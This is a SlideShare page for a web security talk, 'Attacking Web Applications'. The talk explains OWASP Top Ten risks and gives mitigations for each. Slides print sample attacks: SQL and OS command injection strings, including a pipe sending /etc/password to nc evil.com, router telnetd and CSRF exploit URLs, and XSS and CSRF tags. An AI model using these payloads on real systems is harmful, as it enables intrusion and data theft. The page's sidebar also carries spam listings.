SlideShare a Scribd company logo

Top Web Application Attacks and How to Prevent Them

Sasha Goldshtein
Sasha Goldshtein

The document discusses common web application attacks and risks like SQL injection, cross-site scripting (XSS), and insecure direct object references. It provides examples of these vulnerabilities and how they can be exploited. It also summarizes best practices for mitigating risks like properly validating and sanitizing user input, using secure protocols like HTTPS, securely storing sensitive data, and being aware of vulnerabilities in web frameworks and libraries. The goal is to educate web developers about the most common security issues and how to avoid exposing applications and users to these risks.

Technology
1 of 34
Download to read offline
Attacking Web Applications Sasha Goldshtein CTO, Sela Group blog.sashag.net @goldshtn
Sasha Goldshtein @goldshtn Every web developer must be aware of the most common web attacks, risks, and mitigations. Don’t fly blind.
Sasha Goldshtein @goldshtn Typical Risks §  Exposure of user information -  Passwords, emails, identity theft §  Direct financial gain -  Credit card details §  Creating a botnet -  Using servers/user systems for malicious activity §  Denial of service §  Some serious damage™ -  Considering that more and more embedded systems serve stuff over HTTP
Sasha Goldshtein @goldshtn Are They Really After Me? 1.  They could be, if you’re important. 2.  They are after your users. 3.  They are after your servers. 4.  They found you randomly on the web.
Sasha Goldshtein @goldshtn OWASP Top Ten 1.  Injection 2.  Broken auth and session management 3.  Cross-site scripting 4.  Insecure direct object references 5.  Security misconfiguration 6.  Sensitive data exposure 7.  Missing function level access control 8.  Cross-site request forgery 9.  Using vulnerable components 10. Unvalidated redirects and forwards
Sasha Goldshtein @goldshtn SQL Injection §  Suppose the user request parameter is …  '  or  '1'='1   §  Then the query we execute is … select  *  from  users  where  (name=''  or  '1'='1')  and  (password='whatever')   db.ExecuteReader("select  *  from  users  where  (name='"    +  Request["user"]  +  "')  and  (password='"  +  Request["password"]  +  "')");
Sasha Goldshtein @goldshtn
Sasha Goldshtein @goldshtn OS Command Injection §  Suppose we’re too lazy to perform DNS lookup, so we resort to the following: §  Suppose the hostname parameter is …  foo  ||  cat  /etc/password  |  nc  evil.com §  Then we end up sending the password file to evil.com! §  Most recent noisy exploit 10/9/2013 in DLink DIR-505 router firmware:  request=ping_test&ip_addr=127.0.0.1;  /usr/sbin/telnetd;   system("nslookup  "  +  Request["hostname"]);
Sasha Goldshtein @goldshtn DEMO SQL injection and OS command injection
Sasha Goldshtein @goldshtn Mitigating Injections §  DO NOT trust user input §  DO NOT run code provided by the user §  DO NOT use blacklists for validation §  DO use SQL query parameters (?, @param, :param) §  DO use whitelists and regexes for validation §  DO fuzz your code with invalid input
Sasha Goldshtein @goldshtn Sessions and Cookies §  Most web applications today store sensitive user data in cookies §  At the very least, the session identifier is stored in a cookie -  Cookies are tasty §  Don’t store anything else in cookies and don’t trust them -  What if the client sends you: Cookie:  username=dave;permissions=admin  
Sasha Goldshtein @goldshtn DEMO Exploiting vulnerable session information
Sasha Goldshtein @goldshtn Sessions and URLs •  DO NOT embed session id in URLs •  DO NOT trust cookie contents •  DO NOT trust URL query string contents http://example.com/delete_account.php?account_name=sasha •  DO NOT use predictable session ids  http://example.com/cart.php?sess=127 •  DO use a Secure, HttpOnly cookie for session id •  DO use long, random session ids
Sasha Goldshtein @goldshtn HTTP and HTTPS §  Surprisingly many web applications still use HTTP to transmit sensitive information §  Your HTTP traffic is freely available to: -  Your Starbucks barista -  Your family members -  Your ISP -  Your boss §  As a developer, you are responsible for your users sensitive information
Sasha Goldshtein @goldshtn DEMO Manipulating HTTP traffic
Sasha Goldshtein @goldshtn You Have Been Pineappled §  WiFi Pineapple is a mobile pentesting device -  ARM SOC, RAM, internal storage, USB storage, WiFi, Ethernet, 3G modem support §  Karma mode Is this the KatieHomeWiFi? Is this the Starbucks WiFi? Is this the JFKAirportWiFi? Sure
Sasha Goldshtein @goldshtn DroidSheep and zANTI
Sasha Goldshtein @goldshtn Use HTTPS Correctly §  DO NOT send sensitive information over HTTP §  DO NOT display login pages over HTTP §  DO NOT load HTTP frames/scripts/images in an otherwise HTTPS page §  DO insist on pure HTTPS for sensitive pages §  DO use Secure cookies for sensitive data (reminder) And, as a user: §  DO NOT connect to unsecured Wi-Fi networks (like “Free WiFi” or “Fluent”) §  DO use a VPN in insecure environments
Sasha Goldshtein @goldshtn Storing Sensitive Information §  DO NOT store anything you don’t have to store -  Least responsibility principle §  DO comply with regulation for secure storage -  E.g. if you store credit card details, you’re in for some pain
Sasha Goldshtein @goldshtn DEMO Rainbow tables and weak passwords
Sasha Goldshtein @goldshtn http://haveibeenpwned.com by Troy Hunt
Sasha Goldshtein @goldshtn “Password” unseated by “123456” on SplashData’s annual “Worst Passwords” list 1.  123456 2.  password 3.  12345678 4.  qwerty 5.  abc123 6.  123456789 7.  111111 8.  1234567 9.  iloveyou 10. adobe123 11. 123123 12. admin 13. 1234567890 14. letmein 15. photoshop 16. 1234 17. monkey 18. shadow 19. sunshine 20. 12345 21. password1 22. princess 23. azerty 24. trustno1 25. 000000
Sasha Goldshtein @goldshtn Password Storage §  DO NOT store passwords in clear text §  DO NOT store encrypted passwords §  DO hash and salt passwords §  DO reject weak passwords during signup §  DO consider using OAuth §  DISCUSS which hash function to use -  Super-slow (bcrypt) – subject to DOS -  Super-fast (MD5, SHA1) – subject to cracking
Sasha Goldshtein @goldshtn Cross-Site Scripting (XSS) •  Injecting JavaScript into pages viewed by other users – Cookie stealing, information disclosure – DOM manipulation, tricking the user to like Facebook pages, phishing – DDOS, bitcoin mining J •  Temporary XSS  http://searchengine.com/?q=<script>alert(1);</script> •  Persistent XSS – You provide data to the server which is then permanently displayed when users visit
Sasha Goldshtein @goldshtn DEMO Persistent and temporary XSS
Sasha Goldshtein @goldshtn Cross-Site Request Forgery (CSRF) §  Use the fact that the user is already authenticated to a website to generate requests on his behalf  <img  src="http://forum.com/delete_profile.php?confirmed=True"  />   §  Interesting variation: use CSRF to login into YouTube with the attacker’s credentials; then, Google history is stored into the attacker’s account -  “I used to know what you watched on YouTube”
Sasha Goldshtein @goldshtn DEMO Persistent and temporary XSS
Sasha Goldshtein @goldshtn 70 Ways To Encode < <   %3C   &lt   &lt;   &LT   &LT;   &#60   &#060   &#0060   &#00060   &#000060   &#0000060   &#60;   &#060;   &#0060;   &#00060;   &#000060;   &#0000060;   &#x3c   &#x03c   &#x003c   &#x0003c   &#x00003c   &#x000003c   &#x3c;   &#x03c;   &#x003c;   &#x0003c;   &#x00003c;   &#x000003c;   &#X3c   &#X03c   &#X003c   &#X0003c   &#X00003c   &#X000003c   &#X3c;   &#X03c;   &#X003c;   &#X0003c;   &#X00003c;   &#X000003c;   &#x3C   &#x03C   &#x003C   &#x0003C   &#x00003C   &#x000003C   &#x3C;   &#x03C;   &#x003C;   &#x0003C;   &#x00003C;   &#x000003C;   &#X3C   &#X03C   &#X003C   &#X0003C   &#X00003C   &#X000003C   &#X3C;   &#X03C;   &#X003C;   &#X0003C;   &#X00003C;   &#X000003C;   x3c   x3C   u003c   u003C  
Sasha Goldshtein @goldshtn Mitigating XSS and CSRF §  DO NOT trust user input (déjà vu?) §  DO NOT allow GETs to modify state §  DO NOT rely on blacklists §  DO escape and sanitize HTML provided by the user §  DO use whitelists or a non-HTML format like Markdown §  DO generate anti-CSRF tokens and validate them §  DO validate Referer headers
Sasha Goldshtein @goldshtn Admin Consoles §  DO NOT leave admin consoles exposed to the Internet §  DO NOT provide “extra helpful” troubleshooting info §  DO restrict admin consoles to local network only §  DO whitelist IP addresses if absolutely necessary Some auth cookies… yum!
Sasha Goldshtein @goldshtn DEMO Locating admin consoles through Google
Sasha Goldshtein @goldshtn DLink DIR-615 and DIR-300 Security Advisory •  OS command injection http://<IP>/tools_vct.xgi?set/runtime/switch/getlinktype=1&set/runtime/diagnostic/ pingIp=1.1.1.1`telnetd`&pingIP=1.1.1.1   •  CSRF to change admin password and enable remote administration (Internet-facing) http://<IP>/tools_admin.php?ACTION_POST=1&apply=Save +Settings&admin_name=admin&admin_password1=admin1&admin_password2=admin1&grap_auth_enable_h =0&rt_enable=on&rt_enable_h=1&rt_ipaddr=0.0.0.0&rt_port=8080     •  Information disclosure http://<IP>/DevInfo.txt   •  Insecure password storage $  cat  var/etc/httpasswd   admin:admin  
Sasha Goldshtein @goldshtn Summary & Call To Action §  Be aware of security risks and typical vulnerabilities §  Ensure your developers get up to date security training §  Learn how to use the mitigation and prevention tools in your Web framework §  Review code for security, not just correctness §  If your web app is secure, attackers will try other routes
Thank You! Sasha Goldshtein CTO, Sela Group blog.sashag.net @goldshtn

Recommended

OAuth
OAuthOAuth
OAuthBlaine
 
Web Security Horror Stories
Web Security Horror StoriesWeb Security Horror Stories
Web Security Horror StoriesSimon Willison
 
Web application Security
Web application SecurityWeb application Security
Web application SecurityLee C
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10Sastry Tumuluri
 
URL to HTML
URL to HTMLURL to HTML
URL to HTMLFrancois Marier
 
Protect Your Data Against Malicious Scripts
Protect Your Data Against Malicious ScriptsProtect Your Data Against Malicious Scripts
Protect Your Data Against Malicious ScriptsSalesforce Developers
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threatAvădănei Andrei
 
Storing passwords-honey words
Storing passwords-honey wordsStoring passwords-honey words
Storing passwords-honey wordskandulasindhu
 

Recommended

OAuth
OAuthOAuth
OAuthBlaine
 
Web Security Horror Stories
Web Security Horror StoriesWeb Security Horror Stories
Web Security Horror StoriesSimon Willison
 
Web application Security
Web application SecurityWeb application Security
Web application SecurityLee C
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10Sastry Tumuluri
 
URL to HTML
URL to HTMLURL to HTML
URL to HTMLFrancois Marier
 
Protect Your Data Against Malicious Scripts
Protect Your Data Against Malicious ScriptsProtect Your Data Against Malicious Scripts
Protect Your Data Against Malicious ScriptsSalesforce Developers
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threatAvădănei Andrei
 
Storing passwords-honey words
Storing passwords-honey wordsStoring passwords-honey words
Storing passwords-honey wordskandulasindhu
 
Attacking Web Applications
Attacking Web ApplicationsAttacking Web Applications
Attacking Web ApplicationsSasha Goldshtein
 
Django Web Application Security
Django Web Application SecurityDjango Web Application Security
Django Web Application Securitylevigross
 
Security Ninjas: An Open Source Application Security Training Program
Security Ninjas: An Open Source Application Security Training ProgramSecurity Ninjas: An Open Source Application Security Training Program
Security Ninjas: An Open Source Application Security Training ProgramOpenDNS
 
Presentation on Top 10 Vulnerabilities in Web Application
Presentation on Top 10 Vulnerabilities in Web ApplicationPresentation on Top 10 Vulnerabilities in Web Application
Presentation on Top 10 Vulnerabilities in Web ApplicationMd Mahfuzur Rahman
 
Don't Get Stung
Don't Get StungDon't Get Stung
Don't Get StungBarry Dorrans
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threatRomanian Cyber Conference
 
Roberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacksRoberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacksPietro Polsinelli
 
Personal Internet Security System
Personal Internet Security SystemPersonal Internet Security System
Personal Internet Security SystemMatthew Bricker
 
Avoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might thinkAvoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might thinkErlend Oftedal
 
The life of breached data and the attack lifecycle
The life of breached data and the attack lifecycleThe life of breached data and the attack lifecycle
The life of breached data and the attack lifecycleJarrod Overson
 
Hacknbeers sqli and cryptography
Hacknbeers sqli and cryptographyHacknbeers sqli and cryptography
Hacknbeers sqli and cryptographyMiguel Ibarra
 
Defcon9 Presentation2001
Defcon9 Presentation2001Defcon9 Presentation2001
Defcon9 Presentation2001Miguel Ibarra
 
Web Application Security - "In theory and practice"
Web Application Security - "In theory and practice"Web Application Security - "In theory and practice"
Web Application Security - "In theory and practice"Jeremiah Grossman
 
Hacking Ruby on Rails at Railswaycon09
Hacking Ruby on Rails at Railswaycon09Hacking Ruby on Rails at Railswaycon09
Hacking Ruby on Rails at Railswaycon09heikowebers
 
Token Authentication for Java Applications
Token Authentication for Java ApplicationsToken Authentication for Java Applications
Token Authentication for Java ApplicationsStormpath
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013Edouard de Lansalut
 
OpenID Security
OpenID SecurityOpenID Security
OpenID Securityeugenet
 
The Life of Breached Data & The Dark Side of Security
The Life of Breached Data & The Dark Side of SecurityThe Life of Breached Data & The Dark Side of Security
The Life of Breached Data & The Dark Side of SecurityJarrod Overson
 
Building Secure Twitter Apps
Building Secure Twitter AppsBuilding Secure Twitter Apps
Building Secure Twitter AppsDamon Cortesi
 
WordPress Security - WordPress Meetup Copenhagen 2013
WordPress Security - WordPress Meetup Copenhagen 2013WordPress Security - WordPress Meetup Copenhagen 2013
WordPress Security - WordPress Meetup Copenhagen 2013Thor Kristiansen
 
Modern Linux Tracing Landscape
Modern Linux Tracing LandscapeModern Linux Tracing Landscape
Modern Linux Tracing LandscapeSasha Goldshtein
 
The Next Linux Superpower: eBPF Primer
The Next Linux Superpower: eBPF PrimerThe Next Linux Superpower: eBPF Primer
The Next Linux Superpower: eBPF PrimerSasha Goldshtein
 

More Related Content

Similar to Top Web Application Attacks and How to Prevent Them

Attacking Web Applications
Attacking Web ApplicationsAttacking Web Applications
Attacking Web ApplicationsSasha Goldshtein
 
Django Web Application Security
Django Web Application SecurityDjango Web Application Security
Django Web Application Securitylevigross
 
Security Ninjas: An Open Source Application Security Training Program
Security Ninjas: An Open Source Application Security Training ProgramSecurity Ninjas: An Open Source Application Security Training Program
Security Ninjas: An Open Source Application Security Training ProgramOpenDNS
 
Presentation on Top 10 Vulnerabilities in Web Application
Presentation on Top 10 Vulnerabilities in Web ApplicationPresentation on Top 10 Vulnerabilities in Web Application
Presentation on Top 10 Vulnerabilities in Web ApplicationMd Mahfuzur Rahman
 
Roberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacksRoberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacksPietro Polsinelli
 
Personal Internet Security System
Personal Internet Security SystemPersonal Internet Security System
Personal Internet Security SystemMatthew Bricker
 
Avoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might thinkAvoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might thinkErlend Oftedal
 
The life of breached data and the attack lifecycle
The life of breached data and the attack lifecycleThe life of breached data and the attack lifecycle
The life of breached data and the attack lifecycleJarrod Overson
 
Hacknbeers sqli and cryptography
Hacknbeers sqli and cryptographyHacknbeers sqli and cryptography
Hacknbeers sqli and cryptographyMiguel Ibarra
 
Defcon9 Presentation2001
Defcon9 Presentation2001Defcon9 Presentation2001
Defcon9 Presentation2001Miguel Ibarra
 
Web Application Security - "In theory and practice"
Web Application Security - "In theory and practice"Web Application Security - "In theory and practice"
Web Application Security - "In theory and practice"Jeremiah Grossman
 
Hacking Ruby on Rails at Railswaycon09
Hacking Ruby on Rails at Railswaycon09Hacking Ruby on Rails at Railswaycon09
Hacking Ruby on Rails at Railswaycon09heikowebers
 
Token Authentication for Java Applications
Token Authentication for Java ApplicationsToken Authentication for Java Applications
Token Authentication for Java ApplicationsStormpath
 
OpenID Security
OpenID SecurityOpenID Security
OpenID Securityeugenet
 
The Life of Breached Data & The Dark Side of Security
The Life of Breached Data & The Dark Side of SecurityThe Life of Breached Data & The Dark Side of Security
The Life of Breached Data & The Dark Side of SecurityJarrod Overson
 
Building Secure Twitter Apps
Building Secure Twitter AppsBuilding Secure Twitter Apps
Building Secure Twitter AppsDamon Cortesi
 
WordPress Security - WordPress Meetup Copenhagen 2013
WordPress Security - WordPress Meetup Copenhagen 2013WordPress Security - WordPress Meetup Copenhagen 2013
WordPress Security - WordPress Meetup Copenhagen 2013Thor Kristiansen
 

Similar to Top Web Application Attacks and How to Prevent Them (20)

Attacking Web Applications
Attacking Web ApplicationsAttacking Web Applications
Attacking Web Applications
 
Django Web Application Security
Django Web Application SecurityDjango Web Application Security
Django Web Application Security
 
Security Ninjas: An Open Source Application Security Training Program
Security Ninjas: An Open Source Application Security Training ProgramSecurity Ninjas: An Open Source Application Security Training Program
Security Ninjas: An Open Source Application Security Training Program
 
Presentation on Top 10 Vulnerabilities in Web Application
Presentation on Top 10 Vulnerabilities in Web ApplicationPresentation on Top 10 Vulnerabilities in Web Application
Presentation on Top 10 Vulnerabilities in Web Application
 
Don't Get Stung
Don't Get StungDon't Get Stung
Don't Get Stung
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
Roberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacksRoberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacks
 
Personal Internet Security System
Personal Internet Security SystemPersonal Internet Security System
Personal Internet Security System
 
Avoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might thinkAvoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might think
 
The life of breached data and the attack lifecycle
The life of breached data and the attack lifecycleThe life of breached data and the attack lifecycle
The life of breached data and the attack lifecycle
 
Hacknbeers sqli and cryptography
Hacknbeers sqli and cryptographyHacknbeers sqli and cryptography
Hacknbeers sqli and cryptography
 
Defcon9 Presentation2001
Defcon9 Presentation2001Defcon9 Presentation2001
Defcon9 Presentation2001
 
Web Application Security - "In theory and practice"
Web Application Security - "In theory and practice"Web Application Security - "In theory and practice"
Web Application Security - "In theory and practice"
 
Hacking Ruby on Rails at Railswaycon09
Hacking Ruby on Rails at Railswaycon09Hacking Ruby on Rails at Railswaycon09
Hacking Ruby on Rails at Railswaycon09
 
Token Authentication for Java Applications
Token Authentication for Java ApplicationsToken Authentication for Java Applications
Token Authentication for Java Applications
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013
 
OpenID Security
OpenID SecurityOpenID Security
OpenID Security
 
The Life of Breached Data & The Dark Side of Security
The Life of Breached Data & The Dark Side of SecurityThe Life of Breached Data & The Dark Side of Security
The Life of Breached Data & The Dark Side of Security
 
Building Secure Twitter Apps
Building Secure Twitter AppsBuilding Secure Twitter Apps
Building Secure Twitter Apps
 
WordPress Security - WordPress Meetup Copenhagen 2013
WordPress Security - WordPress Meetup Copenhagen 2013WordPress Security - WordPress Meetup Copenhagen 2013
WordPress Security - WordPress Meetup Copenhagen 2013
 

More from Sasha Goldshtein

Modern Linux Tracing Landscape
Modern Linux Tracing LandscapeModern Linux Tracing Landscape
Modern Linux Tracing LandscapeSasha Goldshtein
 
The Next Linux Superpower: eBPF Primer
The Next Linux Superpower: eBPF PrimerThe Next Linux Superpower: eBPF Primer
The Next Linux Superpower: eBPF PrimerSasha Goldshtein
 
Staring into the eBPF Abyss
Staring into the eBPF AbyssStaring into the eBPF Abyss
Staring into the eBPF AbyssSasha Goldshtein
 
Visual Studio 2015 and the Next .NET Framework
Visual Studio 2015 and the Next .NET FrameworkVisual Studio 2015 and the Next .NET Framework
Visual Studio 2015 and the Next .NET FrameworkSasha Goldshtein
 
Swift: Apple's New Programming Language for iOS and OS X
Swift: Apple's New Programming Language for iOS and OS XSwift: Apple's New Programming Language for iOS and OS X
Swift: Apple's New Programming Language for iOS and OS XSasha Goldshtein
 
C# Everywhere: Cross-Platform Mobile Apps with Xamarin
C# Everywhere: Cross-Platform Mobile Apps with XamarinC# Everywhere: Cross-Platform Mobile Apps with Xamarin
C# Everywhere: Cross-Platform Mobile Apps with XamarinSasha Goldshtein
 
Modern Backends for Mobile Apps
Modern Backends for Mobile AppsModern Backends for Mobile Apps
Modern Backends for Mobile AppsSasha Goldshtein
 
Performance and Debugging with the Diagnostics Hub in Visual Studio 2013
Performance and Debugging with the Diagnostics Hub in Visual Studio 2013Performance and Debugging with the Diagnostics Hub in Visual Studio 2013
Performance and Debugging with the Diagnostics Hub in Visual Studio 2013Sasha Goldshtein
 
Mastering IntelliTrace in Development and Production
Mastering IntelliTrace in Development and ProductionMastering IntelliTrace in Development and Production
Mastering IntelliTrace in Development and ProductionSasha Goldshtein
 
Delivering Millions of Push Notifications in Minutes
Delivering Millions of Push Notifications in MinutesDelivering Millions of Push Notifications in Minutes
Delivering Millions of Push Notifications in MinutesSasha Goldshtein
 
Building Mobile Apps with a Mobile Services .NET Backend
Building Mobile Apps with a Mobile Services .NET BackendBuilding Mobile Apps with a Mobile Services .NET Backend
Building Mobile Apps with a Mobile Services .NET BackendSasha Goldshtein
 
Building iOS and Android Apps with Mobile Services
Building iOS and Android Apps with Mobile ServicesBuilding iOS and Android Apps with Mobile Services
Building iOS and Android Apps with Mobile ServicesSasha Goldshtein
 
Windows Azure Mobile Services
Windows Azure Mobile ServicesWindows Azure Mobile Services
Windows Azure Mobile ServicesSasha Goldshtein
 
First Steps in Android Development
First Steps in Android DevelopmentFirst Steps in Android Development
First Steps in Android DevelopmentSasha Goldshtein
 
First Steps in iOS Development
First Steps in iOS DevelopmentFirst Steps in iOS Development
First Steps in iOS DevelopmentSasha Goldshtein
 

More from Sasha Goldshtein (20)

Modern Linux Tracing Landscape
Modern Linux Tracing LandscapeModern Linux Tracing Landscape
Modern Linux Tracing Landscape
 
The Next Linux Superpower: eBPF Primer
The Next Linux Superpower: eBPF PrimerThe Next Linux Superpower: eBPF Primer
The Next Linux Superpower: eBPF Primer
 
Staring into the eBPF Abyss
Staring into the eBPF AbyssStaring into the eBPF Abyss
Staring into the eBPF Abyss
 
Visual Studio 2015 and the Next .NET Framework
Visual Studio 2015 and the Next .NET FrameworkVisual Studio 2015 and the Next .NET Framework
Visual Studio 2015 and the Next .NET Framework
 
Swift: Apple's New Programming Language for iOS and OS X
Swift: Apple's New Programming Language for iOS and OS XSwift: Apple's New Programming Language for iOS and OS X
Swift: Apple's New Programming Language for iOS and OS X
 
C# Everywhere: Cross-Platform Mobile Apps with Xamarin
C# Everywhere: Cross-Platform Mobile Apps with XamarinC# Everywhere: Cross-Platform Mobile Apps with Xamarin
C# Everywhere: Cross-Platform Mobile Apps with Xamarin
 
Modern Backends for Mobile Apps
Modern Backends for Mobile AppsModern Backends for Mobile Apps
Modern Backends for Mobile Apps
 
.NET Debugging Workshop
.NET Debugging Workshop.NET Debugging Workshop
.NET Debugging Workshop
 
Performance and Debugging with the Diagnostics Hub in Visual Studio 2013
Performance and Debugging with the Diagnostics Hub in Visual Studio 2013Performance and Debugging with the Diagnostics Hub in Visual Studio 2013
Performance and Debugging with the Diagnostics Hub in Visual Studio 2013
 
Mastering IntelliTrace in Development and Production
Mastering IntelliTrace in Development and ProductionMastering IntelliTrace in Development and Production
Mastering IntelliTrace in Development and Production
 
Introduction to RavenDB
Introduction to RavenDBIntroduction to RavenDB
Introduction to RavenDB
 
State of the Platforms
State of the PlatformsState of the Platforms
State of the Platforms
 
Delivering Millions of Push Notifications in Minutes
Delivering Millions of Push Notifications in MinutesDelivering Millions of Push Notifications in Minutes
Delivering Millions of Push Notifications in Minutes
 
Building Mobile Apps with a Mobile Services .NET Backend
Building Mobile Apps with a Mobile Services .NET BackendBuilding Mobile Apps with a Mobile Services .NET Backend
Building Mobile Apps with a Mobile Services .NET Backend
 
Building iOS and Android Apps with Mobile Services
Building iOS and Android Apps with Mobile ServicesBuilding iOS and Android Apps with Mobile Services
Building iOS and Android Apps with Mobile Services
 
Task and Data Parallelism
Task and Data ParallelismTask and Data Parallelism
Task and Data Parallelism
 
What's New in C++ 11?
What's New in C++ 11?What's New in C++ 11?
What's New in C++ 11?
 
Windows Azure Mobile Services
Windows Azure Mobile ServicesWindows Azure Mobile Services
Windows Azure Mobile Services
 
First Steps in Android Development
First Steps in Android DevelopmentFirst Steps in Android Development
First Steps in Android Development
 
First Steps in iOS Development
First Steps in iOS DevelopmentFirst Steps in iOS Development
First Steps in iOS Development
 

Recently uploaded

Azure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAzure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAndikSusilo4
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhisoniya singh
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...HostedbyConfluent
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksSoftradix Technologies
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 

Recently uploaded (20)

Azure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAzure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & Application
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptxVulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
Pigging Solutions Piggable Sweeping Elbows
